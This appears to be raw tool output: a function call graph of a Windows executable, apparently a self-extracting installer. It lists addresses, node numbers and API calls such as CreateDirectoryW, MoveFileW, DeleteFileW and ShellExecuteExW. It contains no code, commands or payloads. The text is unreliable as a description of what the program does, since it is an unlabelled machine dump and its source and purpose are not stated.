26835->26812 26835->26814 26835->26817 26835->26825 26835->26828 26835->26830 26835->26833 26837 7ff731c85a68 33 API calls 26835->26837 26838 7ff731c7e174 33 API calls 26835->26838 26839 7ff731c7250c SetDlgItemTextW 26835->26839 26841 7ff731c71150 33 API calls 26835->26841 26843 7ff731c87db4 47 API calls 26835->26843 26847 7ff731c99948 31 API calls 26835->26847 26848 7ff731c72034 33 API calls 26835->26848 26850 7ff731c71fa0 31 API calls 26835->26850 26853 7ff731c7129c 33 API calls 26835->26853 26855 7ff731c9df19 EndDialog 26835->26855 26857 7ff731c8327c 51 API calls 26835->26857 26859 7ff731c9daa1 MoveFileW 26835->26859 26835->26860 26863 7ff731c82f18 56 API calls 26835->26863 27044 7ff731c91344 CompareStringW 26835->27044 27083 7ff731c8cf60 35 API calls _invalid_parameter_noinfo_noreturn 26835->27083 27084 7ff731c99534 33 API calls Concurrency::cancel_current_task 26835->27084 27085 7ff731ca0604 31 API calls _invalid_parameter_noinfo_noreturn 26835->27085 27087 7ff731c9a7b4 33 API calls _invalid_parameter_noinfo_noreturn 26835->27087 27088 7ff731c99498 33 API calls 26835->27088 27091 7ff731c9ab68 33 API calls 3 library calls 26835->27091 27092 7ff731c87328 33 API calls 2 library calls 26835->27092 27093 7ff731c84048 33 API calls 26835->27093 27094 7ff731c86570 33 API calls 3 library calls 26835->27094 27095 7ff731c8728c 26835->27095 27099 7ff731c8317c 26835->27099 27113 7ff731c83e60 FindClose 26835->27113 27114 7ff731c91374 CompareStringW 26835->27114 27115 7ff731c99c50 47 API calls 26835->27115 27116 7ff731c98758 51 API calls 3 library calls 26835->27116 27117 7ff731c9aad4 33 API calls _handle_error 26835->27117 27118 7ff731c85ac8 CompareStringW 26835->27118 27119 7ff731c87e70 47 API calls 26835->27119 26836->26840 26837->26835 26838->26835 26839->26835 26844 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26840->26844 26841->26835 26843->26835 26844->26846 26846->26827 26847->26835 26848->26835 26849->26832 26850->26835 26853->26835 26854->26832 26855->26835 26857->26835 26858->26832 26859->26860 26861 7ff731c9dad5 MoveFileExW 26859->26861 26860->26727 26860->26779 26860->26816 26860->26835 26862 7ff731c71fa0 31 API calls 26860->26862 27086 7ff731c7df5c 47 API calls BuildCatchObjectHelperInternal 26860->27086 27089 7ff731c72674 31 API calls _invalid_parameter_noinfo_noreturn 26860->27089 27090 7ff731c9a3c0 114 API calls 2 library calls 26860->27090 26861->26860 26862->26860 26863->26835 26866 7ff731c9f923 26865->26866 26867 7ff731c720b0 33 API calls 26866->26867 26868 7ff731c9f939 26867->26868 26869 7ff731c9f96e 26868->26869 26870 7ff731c720b0 33 API calls 26868->26870 27143 7ff731c7e35c 26869->27143 26870->26869 26872 7ff731c9f9cb 27163 7ff731c7e7b8 26872->27163 26874 7ff731c9f9d6 26875 7ff731ca22a0 _handle_error 8 API calls 26874->26875 26876 7ff731c9bbd2 26875->26876 26876->26520 26879 7ff731c9841c 4 API calls 26878->26879 26880 7ff731c9f33f 26879->26880 26881 7ff731c9f437 26880->26881 26882 7ff731c9f347 GetWindow 26880->26882 26883 7ff731ca22a0 _handle_error 8 API calls 26881->26883 26887 7ff731c9f362 26882->26887 26884 7ff731c9be1b 26883->26884 26884->26280 26884->26281 26885 7ff731c9f36e GetClassNameW 28058 7ff731c91344 CompareStringW 26885->28058 26887->26881 26887->26885 26888 7ff731c9f416 GetWindow 26887->26888 26889 7ff731c9f397 GetWindowLongPtrW 26887->26889 26888->26881 26888->26887 26889->26888 26890 7ff731c9f3a9 SendMessageW 26889->26890 26890->26888 26891 7ff731c9f3c5 GetObjectW 26890->26891 28059 7ff731c98484 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26891->28059 26893 7ff731c9f3e1 26894 7ff731c9844c 4 API calls 26893->26894 28060 7ff731c98d74 16 API calls _handle_error 26893->28060 26894->26893 26896 7ff731c9f3f9 SendMessageW DeleteObject 26896->26888 26898 7ff731c7252a SetWindowTextW 26897->26898 26899 7ff731c72527 26897->26899 26900 7ff731cde2db 26898->26900 26899->26898 26901->26307 26902->26376 26904 7ff731c8327c 51 API calls 26903->26904 26905 7ff731c83271 26904->26905 26905->26386 26905->26408 26906->26386 26907->26460 26908->26492 26909->26503 26910->26513 26911->26518 26912->26528 26914 7ff731ca35a0 26913->26914 26914->26532 26915->26449 26917 7ff731c71177 26916->26917 26918 7ff731c72034 33 API calls 26917->26918 26919 7ff731c71185 BuildCatchObjectHelperInternal 26918->26919 26919->26464 26920->26485 26921->26553 26922->26576 26923->26591 26924->26603 26926 7ff731c83de8 swprintf 46 API calls 26925->26926 26927 7ff731c8a4c9 26926->26927 26928 7ff731c90ee8 WideCharToMultiByte 26927->26928 26934 7ff731c8a4d9 26928->26934 26929 7ff731c8a549 26950 7ff731c893c8 26929->26950 26932 7ff731c8a6b2 GetSystemMetrics GetWindow 26937 7ff731c8a7e1 26932->26937 26947 7ff731c8a6dd 26932->26947 26933 7ff731c8a5c3 26935 7ff731c8a682 26933->26935 26936 7ff731c8a5cc GetWindowLongPtrW 26933->26936 26934->26929 26944 7ff731c897c0 31 API calls 26934->26944 26948 7ff731c8a52a SetDlgItemTextW 26934->26948 26965 7ff731c89568 26935->26965 26939 7ff731cde2c0 26936->26939 26938 7ff731ca22a0 _handle_error 8 API calls 26937->26938 26941 7ff731c8a7f0 26938->26941 26942 7ff731c8a66a GetWindowRect 26939->26942 26941->26616 26942->26935 26944->26934 26945 7ff731c8a6a5 SetWindowTextW 26945->26932 26946 7ff731c8a6fe GetWindowRect 26946->26947 26947->26937 26947->26946 26949 7ff731c8a7c0 GetWindow 26947->26949 26948->26934 26949->26937 26949->26947 26951 7ff731c89568 47 API calls 26950->26951 26954 7ff731c8940f 26951->26954 26952 7ff731c8951a 26953 7ff731ca22a0 _handle_error 8 API calls 26952->26953 26955 7ff731c8954e GetWindowRect GetClientRect 26953->26955 26954->26952 26956 7ff731c7129c 33 API calls 26954->26956 26955->26932 26955->26933 26958 7ff731c8945c 26956->26958 26957 7ff731c89561 26959 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26957->26959 26958->26957 26960 7ff731c7129c 33 API calls 26958->26960 26961 7ff731c89567 26959->26961 26962 7ff731c894d4 26960->26962 26962->26952 26963 7ff731c8955c 26962->26963 26964 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26963->26964 26964->26957 26966 7ff731c83de8 swprintf 46 API calls 26965->26966 26967 7ff731c895ab 26966->26967 26968 7ff731c90ee8 WideCharToMultiByte 26967->26968 26969 7ff731c895c3 26968->26969 26970 7ff731c897c0 31 API calls 26969->26970 26971 7ff731c895db 26970->26971 26972 7ff731ca22a0 _handle_error 8 API calls 26971->26972 26973 7ff731c895eb 26972->26973 26973->26932 26973->26945 26975 7ff731c713a4 33 API calls 26974->26975 26976 7ff731c72462 GetWindowTextW 26975->26976 26977 7ff731c72494 26976->26977 26978 7ff731c7129c 33 API calls 26977->26978 26981 7ff731c724a2 26978->26981 26979 7ff731ca22a0 _handle_error 8 API calls 26982 7ff731c724f3 26979->26982 26980 7ff731c724dd 26980->26979 26981->26980 26983 7ff731c72505 26981->26983 26982->26625 26984 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26983->26984 26985 7ff731c7250a 26984->26985 26986->26635 26988->26650 26990 7ff731c9ae00 GetDlgItem 26989->26990 26991 7ff731c9adbc GetMessageW 26989->26991 26990->26661 26990->26662 26992 7ff731c9adea TranslateMessage DispatchMessageW 26991->26992 26993 7ff731c9addb IsDialogMessageW 26991->26993 26992->26990 26993->26990 26993->26992 26996 7ff731c83673 26994->26996 26995 7ff731c836a0 26997 7ff731c8327c 51 API calls 26995->26997 26996->26995 26998 7ff731c8368c CreateDirectoryW 26996->26998 27000 7ff731c836ae 26997->27000 26998->26995 26999 7ff731c8373d 26998->26999 27001 7ff731c8374d 26999->27001 27014 7ff731c83cf4 26999->27014 27002 7ff731c83751 GetLastError 27000->27002 27004 7ff731c869cc 49 API calls 27000->27004 27005 7ff731ca22a0 _handle_error 8 API calls 27001->27005 27002->27001 27006 7ff731c836dc 27004->27006 27007 7ff731c83779 27005->27007 27008 7ff731c836fb 27006->27008 27009 7ff731c836e0 CreateDirectoryW 27006->27009 27007->26680 27010 7ff731c83734 27008->27010 27011 7ff731c8378e 27008->27011 27009->27008 27010->26999 27010->27002 27012 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27011->27012 27013 7ff731c83793 27012->27013 27015 7ff731c83d1e SetFileAttributesW 27014->27015 27016 7ff731c83d1b 27014->27016 27017 7ff731c83d34 27015->27017 27024 7ff731c83db5 27015->27024 27016->27015 27019 7ff731c869cc 49 API calls 27017->27019 27018 7ff731ca22a0 _handle_error 8 API calls 27020 7ff731c83dca 27018->27020 27021 7ff731c83d59 27019->27021 27020->27001 27022 7ff731c83d5d SetFileAttributesW 27021->27022 27023 7ff731c83d7c 27021->27023 27022->27023 27023->27024 27025 7ff731c83dda 27023->27025 27024->27018 27026 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27025->27026 27027 7ff731c83ddf 27026->27027 27029 7ff731c77206 27028->27029 27031 7ff731c7713b 27028->27031 27038 7ff731c7704c 47 API calls BuildCatchObjectHelperInternal 27029->27038 27035 7ff731c7714b BuildCatchObjectHelperInternal 27031->27035 27037 7ff731c73f48 33 API calls 2 library calls 27031->27037 27033 7ff731c7720b 27034 7ff731c77273 27033->27034 27039 7ff731c7889c 8 API calls BuildCatchObjectHelperInternal 27033->27039 27034->26696 27035->26696 27037->27035 27038->27033 27039->27033 27041 7ff731c9a9af 27040->27041 27042 7ff731c9a9b6 27040->27042 27041->26835 27042->27041 27043 7ff731c71744 33 API calls 27042->27043 27043->27042 27044->26835 27052 7ff731c9f4a9 memcpy_s 27045->27052 27060 7ff731c9f7fd 27045->27060 27046 7ff731c71fa0 31 API calls 27047 7ff731c9f81c 27046->27047 27048 7ff731ca22a0 _handle_error 8 API calls 27047->27048 27049 7ff731c9f828 27048->27049 27049->26803 27050 7ff731c9f604 27053 7ff731c7129c 33 API calls 27050->27053 27052->27050 27135 7ff731c91344 CompareStringW 27052->27135 27054 7ff731c9f640 27053->27054 27055 7ff731c83268 51 API calls 27054->27055 27056 7ff731c9f64a 27055->27056 27057 7ff731c71fa0 31 API calls 27056->27057 27061 7ff731c9f655 27057->27061 27058 7ff731c9f6c2 ShellExecuteExW 27059 7ff731c9f7c6 27058->27059 27066 7ff731c9f6d5 27058->27066 27059->27060 27064 7ff731c9f87b 27059->27064 27060->27046 27061->27058 27063 7ff731c7129c 33 API calls 27061->27063 27062 7ff731c9f70e 27137 7ff731c9fda4 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 27062->27137 27067 7ff731c9f697 27063->27067 27069 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27064->27069 27065 7ff731c9f763 CloseHandle 27070 7ff731c9f772 27065->27070 27071 7ff731c9f781 27065->27071 27066->27062 27066->27065 27076 7ff731c9f701 ShowWindow 27066->27076 27136 7ff731c85b20 53 API calls 2 library calls 27067->27136 27074 7ff731c9f880 27069->27074 27138 7ff731c91344 CompareStringW 27070->27138 27071->27059 27080 7ff731c9f7b7 ShowWindow 27071->27080 27073 7ff731c9f6a5 27078 7ff731c71fa0 31 API calls 27073->27078 27076->27062 27077 7ff731c9f726 27077->27065 27081 7ff731c9f734 GetExitCodeProcess 27077->27081 27079 7ff731c9f6af 27078->27079 27079->27058 27080->27059 27081->27065 27082 7ff731c9f747 27081->27082 27082->27065 27083->26835 27084->26835 27085->26835 27086->26860 27087->26835 27088->26835 27090->26793 27091->26835 27092->26835 27093->26835 27094->26835 27096 7ff731c872aa 27095->27096 27139 7ff731c7b3b8 27096->27139 27100 7ff731c831a7 DeleteFileW 27099->27100 27101 7ff731c831a4 27099->27101 27102 7ff731c831bd 27100->27102 27103 7ff731c8323c 27100->27103 27101->27100 27105 7ff731c869cc 49 API calls 27102->27105 27104 7ff731ca22a0 _handle_error 8 API calls 27103->27104 27106 7ff731c83251 27104->27106 27107 7ff731c831e2 27105->27107 27106->26835 27108 7ff731c831e6 DeleteFileW 27107->27108 27109 7ff731c83203 27107->27109 27108->27109 27109->27103 27110 7ff731c83261 27109->27110 27111 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27110->27111 27112 7ff731c83266 27111->27112 27114->26835 27115->26835 27116->26835 27117->26835 27118->26835 27119->26835 27122 7ff731c8d21a 27120->27122 27121 7ff731c8d24d 27121->26832 27122->27121 27123 7ff731c71744 33 API calls 27122->27123 27123->27122 27124->26753 27125->26741 27127->26721 27128->26725 27129->26727 27130->26782 27131->26768 27133->26771 27135->27050 27136->27073 27137->27077 27138->27071 27142 7ff731c7b402 memcpy_s 27139->27142 27140 7ff731ca22a0 _handle_error 8 API calls 27141 7ff731c7b4c6 27140->27141 27141->26835 27142->27140 27177 7ff731c886ac 27143->27177 27145 7ff731c7e3d4 27187 7ff731c7e610 31 API calls BuildCatchObjectHelperInternal 27145->27187 27147 7ff731c7e4e4 27150 7ff731ca2150 33 API calls 27147->27150 27148 7ff731c7e559 27151 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27148->27151 27149 7ff731c7e464 27149->27147 27149->27148 27153 7ff731c7e500 27150->27153 27159 7ff731c7e55e 27151->27159 27188 7ff731c930c8 100 API calls 27153->27188 27154 7ff731c7e52d 27155 7ff731ca22a0 _handle_error 8 API calls 27154->27155 27157 7ff731c7e53d 27155->27157 27156 7ff731c8187a 27158 7ff731c818c5 27156->27158 27160 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27156->27160 27157->26872 27158->26872 27159->27156 27159->27158 27161 7ff731c71fa0 31 API calls 27159->27161 27162 7ff731c818f3 27160->27162 27161->27159 27165 7ff731c7e7fa 27163->27165 27164 7ff731c7e8b1 27175 7ff731c7e910 27164->27175 27208 7ff731c7f588 27164->27208 27165->27164 27166 7ff731c7e874 27165->27166 27201 7ff731c83e88 27165->27201 27166->27164 27168 7ff731c7e9a3 27166->27168 27169 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27168->27169 27173 7ff731c7e9a8 27169->27173 27170 7ff731c7e965 27172 7ff731ca22a0 _handle_error 8 API calls 27170->27172 27174 7ff731c7e98e 27172->27174 27174->26874 27175->27170 27244 7ff731c728a4 80 API calls 2 library calls 27175->27244 27178 7ff731c886ca 27177->27178 27179 7ff731ca2150 33 API calls 27178->27179 27180 7ff731c886ef 27179->27180 27181 7ff731c88703 27180->27181 27182 7ff731c79f1c 33 API calls 27180->27182 27183 7ff731ca2150 33 API calls 27181->27183 27182->27181 27184 7ff731c88719 27183->27184 27185 7ff731c8872b 27184->27185 27189 7ff731c79f1c 27184->27189 27185->27145 27187->27149 27188->27154 27194 7ff731ca2420 27189->27194 27192 7ff731ca2420 33 API calls 27193 7ff731c79f75 memcpy_s 27192->27193 27193->27185 27195 7ff731ca2451 27194->27195 27196 7ff731c79f4a 27195->27196 27198 7ff731c79fb0 27195->27198 27196->27192 27199 7ff731c8b744 33 API calls 27198->27199 27200 7ff731c79fc2 27199->27200 27200->27195 27202 7ff731c8728c 8 API calls 27201->27202 27203 7ff731c83ea1 27202->27203 27207 7ff731c83ecf 27203->27207 27245 7ff731c8407c 27203->27245 27206 7ff731c83eba FindClose 27206->27207 27207->27165 27209 7ff731c7f5a8 _snwprintf 27208->27209 27271 7ff731c72950 27209->27271 27212 7ff731c7f5dc 27216 7ff731c7f60c 27212->27216 27288 7ff731c733e4 27212->27288 27215 7ff731c7f608 27215->27216 27320 7ff731c73ad8 27215->27320 27512 7ff731c72c54 27216->27512 27223 7ff731c7f7db 27330 7ff731c7f8b4 27223->27330 27225 7ff731c78d04 33 API calls 27226 7ff731c7f672 27225->27226 27528 7ff731c878d8 48 API calls 2 library calls 27226->27528 27228 7ff731c7f687 27229 7ff731c83e88 55 API calls 27228->27229 27234 7ff731c7f6bd 27229->27234 27231 7ff731c7f852 27231->27216 27335 7ff731c769f8 27231->27335 27346 7ff731c7f940 27231->27346 27237 7ff731c7f75d 27234->27237 27238 7ff731c7f8aa 27234->27238 27240 7ff731c83e88 55 API calls 27234->27240 27529 7ff731c878d8 48 API calls 2 library calls 27234->27529 27237->27223 27237->27238 27239 7ff731c7f8a5 27237->27239 27241 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27238->27241 27243 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27239->27243 27240->27234 27242 7ff731c7f8b0 27241->27242 27243->27238 27244->27170 27246 7ff731c84192 FindNextFileW 27245->27246 27248 7ff731c840b9 FindFirstFileW 27245->27248 27249 7ff731c841b3 27246->27249 27250 7ff731c841a1 GetLastError 27246->27250 27248->27249 27251 7ff731c840de 27248->27251 27252 7ff731c841d1 27249->27252 27254 7ff731c720b0 33 API calls 27249->27254 27270 7ff731c84180 27250->27270 27253 7ff731c869cc 49 API calls 27251->27253 27257 7ff731c7129c 33 API calls 27252->27257 27256 7ff731c84104 27253->27256 27254->27252 27255 7ff731ca22a0 _handle_error 8 API calls 27258 7ff731c83eb4 27255->27258 27259 7ff731c84108 FindFirstFileW 27256->27259 27260 7ff731c84127 27256->27260 27261 7ff731c841fb 27257->27261 27258->27206 27258->27207 27259->27260 27260->27249 27262 7ff731c8416f GetLastError 27260->27262 27264 7ff731c842d4 27260->27264 27263 7ff731c88050 47 API calls 27261->27263 27262->27270 27265 7ff731c84209 27263->27265 27266 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27264->27266 27268 7ff731c842cf 27265->27268 27265->27270 27267 7ff731c842da 27266->27267 27269 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27268->27269 27269->27264 27270->27255 27272 7ff731c7296c 27271->27272 27273 7ff731c79f1c 33 API calls 27272->27273 27274 7ff731c72980 27273->27274 27275 7ff731c886ac 33 API calls 27274->27275 27276 7ff731c7298d 27275->27276 27277 7ff731ca2150 33 API calls 27276->27277 27281 7ff731c72ac2 27276->27281 27279 7ff731c72ab0 27277->27279 27279->27281 27282 7ff731c791c8 35 API calls 27279->27282 27531 7ff731c84cc4 27281->27531 27282->27281 27283 7ff731c82c68 27287 7ff731c82480 54 API calls 27283->27287 27284 7ff731c82c81 27285 7ff731c82c85 27284->27285 27545 7ff731c7b7f8 97 API calls 2 library calls 27284->27545 27285->27212 27287->27284 27319 7ff731c82890 102 API calls 27288->27319 27289 7ff731c73674 27546 7ff731c728a4 80 API calls 2 library calls 27289->27546 27290 7ff731c73431 memcpy_s 27292 7ff731c73601 27290->27292 27300 7ff731c7344e 27290->27300 27316 7ff731c82b70 99 API calls 27290->27316 27292->27215 27293 7ff731c769f8 130 API calls 27295 7ff731c73682 27293->27295 27294 7ff731c734cc 27311 7ff731c82890 102 API calls 27294->27311 27295->27292 27295->27293 27296 7ff731c7370c 27295->27296 27312 7ff731c82a60 99 API calls 27295->27312 27296->27292 27301 7ff731c73740 27296->27301 27547 7ff731c728a4 80 API calls 2 library calls 27296->27547 27298 7ff731c735cb 27299 7ff731c735d7 27298->27299 27298->27300 27299->27292 27302 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27299->27302 27300->27289 27300->27295 27301->27292 27304 7ff731c7384d 27301->27304 27313 7ff731c82b70 99 API calls 27301->27313 27306 7ff731c73891 27302->27306 27303 7ff731c734eb 27303->27298 27317 7ff731c82a60 99 API calls 27303->27317 27304->27292 27305 7ff731c720b0 33 API calls 27304->27305 27305->27292 27306->27215 27307 7ff731c735a7 27307->27298 27314 7ff731c82890 102 API calls 27307->27314 27308 7ff731c769f8 130 API calls 27309 7ff731c7378e 27308->27309 27309->27308 27310 7ff731c73803 27309->27310 27315 7ff731c82a60 99 API calls 27309->27315 27318 7ff731c82a60 99 API calls 27310->27318 27311->27303 27312->27295 27313->27309 27314->27298 27315->27309 27316->27294 27317->27307 27318->27304 27319->27290 27321 7ff731c73af9 27320->27321 27327 7ff731c73b55 27320->27327 27548 7ff731c73378 27321->27548 27322 7ff731ca22a0 _handle_error 8 API calls 27324 7ff731c73b67 27322->27324 27324->27223 27324->27225 27326 7ff731c73b6c 27328 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27326->27328 27327->27322 27329 7ff731c73b71 27328->27329 27714 7ff731c8882c 27330->27714 27332 7ff731c7f8ca 27718 7ff731c8eee0 GetSystemTime SystemTimeToFileTime 27332->27718 27336 7ff731c76a0e 27335->27336 27340 7ff731c76a0a 27335->27340 27345 7ff731c82b70 99 API calls 27336->27345 27337 7ff731c76a1b 27338 7ff731c76a3e 27337->27338 27339 7ff731c76a2f 27337->27339 27789 7ff731c75138 128 API calls 2 library calls 27338->27789 27339->27340 27727 7ff731c75e2c 27339->27727 27340->27231 27343 7ff731c76a3c 27343->27340 27790 7ff731c7466c 80 API calls 27343->27790 27345->27337 27347 7ff731c7f988 27346->27347 27350 7ff731c7f9c0 27347->27350 27354 7ff731c7fa44 27347->27354 27904 7ff731c960ac 135 API calls 3 library calls 27347->27904 27349 7ff731c81141 27352 7ff731c81199 27349->27352 27353 7ff731c81146 27349->27353 27350->27349 27350->27354 27358 7ff731c7f9e0 27350->27358 27351 7ff731ca22a0 _handle_error 8 API calls 27355 7ff731c8117c 27351->27355 27352->27354 27954 7ff731c960ac 135 API calls 3 library calls 27352->27954 27353->27354 27953 7ff731c7dd18 177 API calls 27353->27953 27354->27351 27355->27231 27358->27354 27819 7ff731c79bb0 27358->27819 27360 7ff731c7fae6 27832 7ff731c85eb8 27360->27832 27363 7ff731c7fb8a 27511 7ff731c82a60 99 API calls 27363->27511 27365 7ff731c7fb6e 27365->27363 27906 7ff731c87c54 47 API calls 2 library calls 27365->27906 27367 7ff731c7fd27 27373 7ff731c7fdcc 27367->27373 27374 7ff731c7fde9 27367->27374 27378 7ff731c80f9e 27367->27378 27368 7ff731c7fbe7 27368->27367 27369 7ff731c7fcda 27368->27369 27376 7ff731c720b0 33 API calls 27368->27376 27907 7ff731c85a68 33 API calls 27369->27907 27370 7ff731c81214 27372 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27370->27372 27371 7ff731c8121a 27377 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27371->27377 27372->27371 27380 7ff731c71fa0 31 API calls 27373->27380 27386 7ff731c7fe08 27374->27386 27909 7ff731c7ef20 235 API calls 4 library calls 27374->27909 27376->27369 27382 7ff731c81220 27377->27382 27378->27370 27379 7ff731c81024 27378->27379 27379->27354 27379->27371 27383 7ff731c7fdd6 27380->27383 27381 7ff731c7fce2 27387 7ff731c72034 33 API calls 27381->27387 27385 7ff731c71fa0 31 API calls 27383->27385 27385->27354 27389 7ff731c7fefc 27386->27389 27391 7ff731c83e88 55 API calls 27386->27391 27388 7ff731c7fd00 27387->27388 27908 7ff731c83794 54 API calls _handle_error 27388->27908 27846 7ff731c7e6c0 27389->27846 27396 7ff731c7fea6 27391->27396 27394 7ff731c7fd08 27394->27367 27397 7ff731c720b0 33 API calls 27394->27397 27395 7ff731c803b7 27919 7ff731c88928 107 API calls 27395->27919 27400 7ff731c71fa0 31 API calls 27396->27400 27397->27367 27399 7ff731c80058 27911 7ff731c7eed0 80 API calls 27399->27911 27400->27389 27402 7ff731c7fff5 27402->27399 27910 7ff731c76f38 33 API calls BuildCatchObjectHelperInternal 27402->27910 27405 7ff731c811fc 27407 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27405->27407 27406 7ff731c81202 27414 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27406->27414 27407->27406 27408 7ff731c801e6 27412 7ff731c80509 27413 7ff731c80439 27413->27412 27426 7ff731c8046a 27413->27426 27418 7ff731c81208 27414->27418 27415 7ff731c802da 27415->27413 27920 7ff731c8337c 107 API calls 2 library calls 27415->27920 27420 7ff731c802a8 27434 7ff731c80081 27434->27408 27434->27420 27441 7ff731c8029e 27434->27441 27440 7ff731c7ff14 27440->27405 27447 7ff731c7ff77 27440->27447 27447->27354 27447->27406 27511->27368 27513 7ff731c72c88 27512->27513 27514 7ff731c72c74 27512->27514 27515 7ff731c71fa0 31 API calls 27513->27515 27514->27513 28053 7ff731c72d80 31 API calls _invalid_parameter_noinfo_noreturn 27514->28053 27517 7ff731c72ca1 27515->27517 27520 7ff731c72d2c 27517->27520 28039 7ff731c73090 27517->28039 27519 7ff731c72d08 27521 7ff731c73090 31 API calls 27519->27521 27522 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27520->27522 27523 7ff731c72d14 27521->27523 27524 7ff731c72d7c 27522->27524 27525 7ff731c71fa0 31 API calls 27523->27525 27526 7ff731c72d20 27525->27526 28047 7ff731c8874c 27526->28047 27528->27228 27529->27234 27530 7ff731c90914 81 API calls _handle_error 27530->27231 27532 7ff731c84cf2 memcpy_s 27531->27532 27541 7ff731c84b6c 27532->27541 27534 7ff731c84d14 27536 7ff731c84d6e 27534->27536 27537 7ff731c84d50 27534->27537 27535 7ff731ca22a0 _handle_error 8 API calls 27538 7ff731c72b32 27535->27538 27539 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27536->27539 27537->27535 27538->27212 27538->27283 27540 7ff731c84d73 27539->27540 27542 7ff731c84be7 27541->27542 27544 7ff731c84bef BuildCatchObjectHelperInternal 27541->27544 27543 7ff731c71fa0 31 API calls 27542->27543 27543->27544 27544->27534 27545->27285 27546->27292 27547->27301 27549 7ff731c73396 27548->27549 27550 7ff731c7339a 27548->27550 27549->27326 27549->27327 27554 7ff731c73294 27550->27554 27553 7ff731c82a60 99 API calls 27553->27549 27555 7ff731c732bb 27554->27555 27557 7ff731c732f6 27554->27557 27556 7ff731c769f8 130 API calls 27555->27556 27560 7ff731c732db 27556->27560 27562 7ff731c76e74 27557->27562 27560->27553 27566 7ff731c76e95 27562->27566 27563 7ff731c769f8 130 API calls 27563->27566 27564 7ff731c7331d 27564->27560 27567 7ff731c73904 27564->27567 27566->27563 27566->27564 27594 7ff731c8e784 27566->27594 27602 7ff731c76a7c 27567->27602 27570 7ff731c7396a 27573 7ff731c73989 27570->27573 27574 7ff731c7399a 27570->27574 27571 7ff731c73a8a 27575 7ff731ca22a0 _handle_error 8 API calls 27571->27575 27634 7ff731c90cd4 27573->27634 27577 7ff731c739ec 27574->27577 27578 7ff731c739a3 27574->27578 27576 7ff731c73a9e 27575->27576 27576->27560 27640 7ff731c726b4 33 API calls BuildCatchObjectHelperInternal 27577->27640 27639 7ff731c90c00 33 API calls 27578->27639 27579 7ff731c73ab3 27581 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27579->27581 27583 7ff731c73ab8 27581->27583 27588 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27583->27588 27584 7ff731c739b0 27586 7ff731c739c0 BuildCatchObjectHelperInternal 27584->27586 27589 7ff731c71fa0 31 API calls 27584->27589 27590 7ff731c71fa0 31 API calls 27586->27590 27587 7ff731c73a13 27641 7ff731c90a68 34 API calls _invalid_parameter_noinfo_noreturn 27587->27641 27592 7ff731c73abe 27588->27592 27589->27586 27593 7ff731c7394f 27590->27593 27593->27571 27593->27579 27593->27583 27595 7ff731c8e78d 27594->27595 27596 7ff731c8e7a7 27595->27596 27600 7ff731c7b674 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 27595->27600 27598 7ff731c8e7c1 SetThreadExecutionState 27596->27598 27601 7ff731c7b674 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 27596->27601 27600->27596 27601->27598 27603 7ff731c76a96 _snwprintf 27602->27603 27604 7ff731c76ae4 27603->27604 27605 7ff731c76ac4 27603->27605 27606 7ff731c76d4d 27604->27606 27610 7ff731c76b0f 27604->27610 27678 7ff731c728a4 80 API calls 2 library calls 27605->27678 27688 7ff731c728a4 80 API calls 2 library calls 27606->27688 27609 7ff731c76ad0 27611 7ff731ca22a0 _handle_error 8 API calls 27609->27611 27610->27609 27642 7ff731c91f14 27610->27642 27612 7ff731c7394b 27611->27612 27612->27570 27612->27593 27638 7ff731c72794 33 API calls __std_swap_ranges_trivially_swappable 27612->27638 27615 7ff731c76b85 27616 7ff731c76c2a 27615->27616 27633 7ff731c76b7b 27615->27633 27684 7ff731c88928 107 API calls 27615->27684 27651 7ff731c84720 27616->27651 27617 7ff731c76b6e 27679 7ff731c728a4 80 API calls 2 library calls 27617->27679 27618 7ff731c76b80 27618->27615 27680 7ff731c740b0 27618->27680 27624 7ff731c76c52 27625 7ff731c76cc7 27624->27625 27626 7ff731c76cd1 27624->27626 27655 7ff731c8174c 27625->27655 27685 7ff731c91ea0 149 API calls 2 library calls 27626->27685 27629 7ff731c76ccf 27686 7ff731c846c0 8 API calls _handle_error 27629->27686 27631 7ff731c76cfd 27631->27633 27687 7ff731c7433c 80 API calls 2 library calls 27631->27687 27670 7ff731c917f0 27633->27670 27637 7ff731c90d0c 27634->27637 27635 7ff731c90ec8 27635->27593 27636 7ff731c71744 33 API calls 27636->27637 27637->27635 27637->27636 27638->27570 27639->27584 27640->27587 27641->27593 27643 7ff731c91fd6 std::bad_alloc::bad_alloc 27642->27643 27646 7ff731c91f45 std::bad_alloc::bad_alloc 27642->27646 27645 7ff731ca3ff8 Concurrency::cancel_current_task 2 API calls 27643->27645 27644 7ff731c76b59 27644->27615 27644->27617 27644->27618 27645->27646 27646->27644 27647 7ff731ca3ff8 Concurrency::cancel_current_task 2 API calls 27646->27647 27648 7ff731c91f8f std::bad_alloc::bad_alloc 27646->27648 27647->27648 27648->27644 27649 7ff731ca3ff8 Concurrency::cancel_current_task 2 API calls 